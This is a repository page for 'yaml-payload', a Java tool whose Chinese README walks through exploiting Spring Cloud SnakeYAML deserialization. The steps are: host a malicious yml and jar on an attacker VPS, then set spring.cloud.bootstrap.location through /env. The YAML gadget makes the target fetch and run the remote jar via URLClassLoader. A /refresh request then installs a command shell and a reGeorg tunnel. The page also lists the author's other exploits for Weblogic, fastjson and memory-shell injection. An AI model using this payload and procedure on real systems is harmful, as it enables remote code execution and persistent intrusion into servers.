Y4er/yaml-payload Y4er/yaml-payload

  • Stars
    star
    128
  • Rank 279,983 (Top 6 %)
  • Language
    Java
  • Created about 4 years ago
  • Updated about 4 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Y4er/yaml-payload
github

Y4er

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Spring Cloud SnakeYAML 反序列化一键注入cmdshell和reGeorg

README

Spring Cloud SnakeYAML 一键注册cmd shell和reGeorg

利用条件:

  • 可以 POST 请求目标网站的 /env 接口设置属性
  • 可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
  • 目标依赖的 spring-cloud-starter 版本 < 1.3.0.RELEASE
  • 目标可以请求攻击者的 HTTP 服务器(请求可出外网)

仅在JDK1.8及Spring1.x测试通过,其他版本自测.

利用方法如下:

编译class文件然后打jar包

cd yaml-payload
javac src/artsploit/AwesomeScriptEngineFactory.java -cp ./lib
javac src/artsploit/Tunnel.java -cp ./lib
javac src/artsploit/GameInfo.java -cp ./lib
jar -cvf yaml-payload.jar -C src/ .

托管 yml 和 jar 文件

在自己控制的vps机器上开启一个简单HTTP服务器,端口尽量使用常见HTTP服务端口(80、443)

# 使用 python 快速开启 http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80

在网站根目录下放置后缀为yml的文件yaml-payload.yml,内容如下:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/yaml-payload.jar"]
  ]]
]

在网站根目录下放置打包好的yaml-payload.jar

设置spring.cloud.bootstrap.location属性

POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/yaml-payload.yml

刷新配置

POST /refresh
Content-Type: application/x-www-form-urlencoded

访问注入的shell

  1. reGeorg: http://localhost:9092/api/v1/tunnel
  2. cmd shell: http://localhost:9092/api/v1/game POST:code=whoami

参考

  1. https://github.com/LandGrey/SpringBootVulExploit
  2. https://www.anquanke.com/post/id/198886
  3. https://github.com/artsploit/yaml-payload

More Repositories

1

ysoserial

ysoserial修改版,着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。
Java
609
star
2

WebLogic-Shiro-shell

WebLogic利用CVE-2020-2883打Shiro rememberMe反序列化漏洞,一键注册蚁剑filter内存shell
Java
528
star
3

dotnet-deserialization

dotnet 反序列化学习笔记
412
star
4

CVE-2020-2551

Weblogic IIOP CVE-2020-2551
Java
333
star
5

fastjson-bypass-autotype-1.2.68

fastjson bypass autotype 1.2.68 with Throwable and AutoCloseable.
Java
223
star
6

CVE-2020-2883

Weblogic coherence.jar RCE
Java
178
star
7

CVE-2020-2555

Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE
Java
177
star
8

openam-CVE-2021-35464

openam-CVE-2021-35464 tomcat 执行命令回显
Java
87
star
9

CVE-2020-14645

Weblogic CVE-2020-14645 UniversalExtractor JNDI injection getDatabaseMetaData()
Java
79
star
10

CVE-2020-14756

WebLogic T3/IIOP RCE ExternalizableHelper.class of coherence.jar
Python
79
star
11

javaagent-tomcat-memshell

使用java agent反序列化注入内存shell
Java
67
star
12

CVE-2021-35215

SolarWinds Orion Platform ActionPluginBaseView 反序列化RCE
47
star
13

Y4er

README
1
star